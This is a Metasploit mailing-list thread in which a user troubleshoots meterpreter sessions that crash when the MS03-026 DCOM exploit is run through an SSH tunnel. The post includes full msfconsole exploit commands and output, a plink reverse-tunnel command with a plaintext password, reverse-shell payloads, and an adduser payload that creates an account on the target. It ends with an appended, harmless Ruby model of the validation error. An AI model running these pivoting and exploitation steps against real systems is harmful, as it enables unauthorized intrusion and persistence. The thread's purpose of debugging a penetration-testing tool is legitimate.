Metasploit mailing list archives

Re: Interactive payloads fail through SSH tunnel


From: David Kennedy <kennedyd013 () gmail com>
Date: Sat, 23 Feb 2013 21:48:43 -0500

Set rhost to 0.0.0.0 or 127.0.0.2. 127.0.0.1 has trouble.
On Feb 23, 2013 9:41 PM, "Mike Jones!" <property.of.mike.jones () gmail com>
wrote:

Hello,

Meterpreter crashes when used through an SSH tunnel. I'm sure it is me
doing something stupid so was hoping somebody could point out my mistake.

I start with a meterpreter shell on an unprivileged account, then set up
SSH tunnel for port 135 so I can do MS03-026 exploit against DCOM.

Probably good to mention too that there is no NAT between the two systems.

meterpreter > shell
Process 1936 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\foobar>plink -l root -pw mystupidpassword -R 135:localhost:135
192.168.12.48

My system is 192.168.12.48. Tunnel is created and target has service up
and running on its port 135. Now I set up exploit in separate metasploit
instance.

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf  exploit(ms03_026_dcom) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf  exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms03_026_dcom) > set LHOST 192.168.12.48
LHOST => 192.168.12.48
msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  127.0.0.1        yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread,
process, none
   LHOST     192.168.12.48    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


Now I run exploit and it is successful, payload lands, meterpreter shell
opens.  Then it crashes when I do anything.

msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.12.48:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.13.203

meterpreter > getuid
[-] Session manipulation failed: Validation failed: Address is reserved
["/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/validations.rb:56:in `save!'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/attribute_methods/dirty.rb:33:in `save!'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in `block in save!'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:295:in `block in with_transaction_returning_status'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:208:in `transaction'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:293:in `with_transaction_returning_status'",
 "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in `save!'",
 "/opt/metasploit/msf3/lib/msf/core/db.rb:349:in `block in report_host'",
 "/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'",
 "/opt/metasploit/msf3/lib/msf/core/db.rb:295:in `report_host'",
 "/opt/metasploit/msf3/lib/msf/core/db.rb:1904:in `block in report_event'",
 "/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'",
 "/opt/metasploit/msf3/lib/msf/core/db.rb:1898:in `report_event'",
 "/opt/metasploit/msf3/lib/msf/core/framework.rb:222:in `report_event'",
 "/opt/metasploit/msf3/lib/msf/core/framework.rb:331:in `session_event'",
 "/opt/metasploit/msf3/lib/msf/core/framework.rb:408:in `block in on_session_output'",
 "/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `each'",
 "/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `on_session_output'",
 "/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'",
 "/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'",
 "/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `method_missing'",
 "/opt/metasploit/msf3/lib/msf/core/session_manager.rb:238:in `block in register'",
 "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `call'",
 "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `print_error'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:436:in `unknown_command'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:411:in `run_single'",
 "/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'",
 "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `call'",
 "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `run'",
 "/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'",
 "/opt/metasploit/msf3/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'",
 "/opt/metasploit/msf3/lib/rex/ui/interactive.rb:49:in `interact'",
 "/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1596:in `cmd_sessions'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'",
 "/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:179:in `cmd_exploit'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'",
 "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'",
 "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in `run'",
 "./msfconsole:148:in `<main>'"]


This isn't limited to meterpreter. I tried different payload for just
shell and still crashed.

msf  exploit(ms03_026_dcom) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.12.48:9090
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Sending exploit ...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user test test /add
[-] Session manipulation failed: Validation failed: Address is reserved
... {snipped}

Though a non-interactive payload works ok.

msf  exploit(ms03_026_dcom) > set payload windows/adduser
payload => windows/adduser
msf  exploit(ms03_026_dcom) > set USER testuser
USER => testuser
msf  exploit(ms03_026_dcom) > set PASS Testpass@1
PASS => Testpass@1
msf  exploit(ms03_026_dcom) > exploit

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Sending exploit ...
msf  exploit(ms03_026_dcom) >

In that case, new user 'testuser' was added.

I saw a couple of threads with this same error but didn't glean a simple
solution from them. There are also lots of instances of this error on pastebin.

https://community.rapid7.com/thread/2046
https://community.rapid7.com/thread/1856

Also saw an example where the person set ExitOnSession false, tried that,
still crashes.

Guys help I am stupid what am I doing wrong?

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
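Added example, not code from this thread or from Metasploit: a small Ruby stand-in for the host-address validation that the backtrace above shows failing on the report_host -> save! path whenever the session produces output. It assumes, consistent with the reply's workaround, that the framework of that era rejected the literal string 127.0.0.1 with the message "is reserved"; the module name HostAddressCheck and its methods are constructed for illustration. The second check (reserved_by_range?) is a stricter rule over the whole 127.0.0.0/8 block plus 0.0.0.0, included so the reader can see why 127.0.0.2 and 0.0.0.0 get past an exact-string exclusion but not a range check.

```ruby
require 'ipaddr'

# Constructed stand-in for the host-address validation seen failing in the
# backtrace (report_host -> save! -> "Validation failed: Address is reserved").
# Added example, not Metasploit's own code. ASSUMPTION: the Host model rejected
# the literal string 127.0.0.1, which is why 127.0.0.2 and 0.0.0.0 were
# suggested as RHOST values that still save.
module HostAddressCheck
  RESERVED_EXACT = ['127.0.0.1'].freeze

  # Validation messages for an address; an empty array means the record saves
  # and the interactive session keeps working.
  def self.errors_for(address)
    begin
      IPAddr.new(address)
    rescue IPAddr::InvalidAddressError, ArgumentError
      return ['Address is not a valid IP address']
    end
    RESERVED_EXACT.include?(address) ? ['Address is reserved'] : []
  end

  # Models ActiveRecord's save!: raises with the joined messages, producing the
  # same text that follows "Session manipulation failed:" in the thread.
  def self.save!(address)
    errs = errors_for(address)
    raise "Validation failed: #{errs.join(', ')}" unless errs.empty?
    true
  end

  # Stricter comparison rule: the whole loopback block and the unspecified
  # address count as reserved. Under this rule the suggested workarounds would
  # also be rejected, which shows how much the exact-match rule lets through.
  def self.reserved_by_range?(address)
    ip = IPAddr.new(address)
    ip.ipv4? && (ip.loopback? || ip == IPAddr.new('0.0.0.0'))
  end

  # What report_host sees for a session that arrived through the SSH tunnel:
  # the exploit's RHOST is the local end of the forward, not the victim.
  # Returns [saved?, message] instead of letting the exception escape.
  def self.report_host_for_session(rhost)
    save!(rhost)
    [true, "host #{rhost} recorded (this is the tunnel endpoint, not the real target)"]
  rescue RuntimeError => e
    [false, "Session manipulation failed: #{e.message}"]
  end
end

if __FILE__ == $0
  # 192.168.13.203 is the address the stage was sent to in the thread; the
  # loopback values are the RHOST settings discussed above.
  %w[127.0.0.1 127.0.0.2 0.0.0.0 192.168.13.203].each do |a|
    ok, msg = HostAddressCheck.report_host_for_session(a)
    range = HostAddressCheck.reserved_by_range?(a) ? 'reserved' : 'allowed'
    puts "#{a.ljust(16)} exact-match: #{ok ? 'saves' : 'rejected'}  range-check: #{range}  #{msg}"
  end
end
```

Run it with ruby and it prints one line per address. Whatever the framework's exact rule was, two things from the thread follow from this path: the session is keyed on the tunnel's local endpoint, so the database entry does not describe the machine that was actually exploited, and a payload that opens no session (the adduser case) never enters on_session_output and so never reaches the validation at all.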

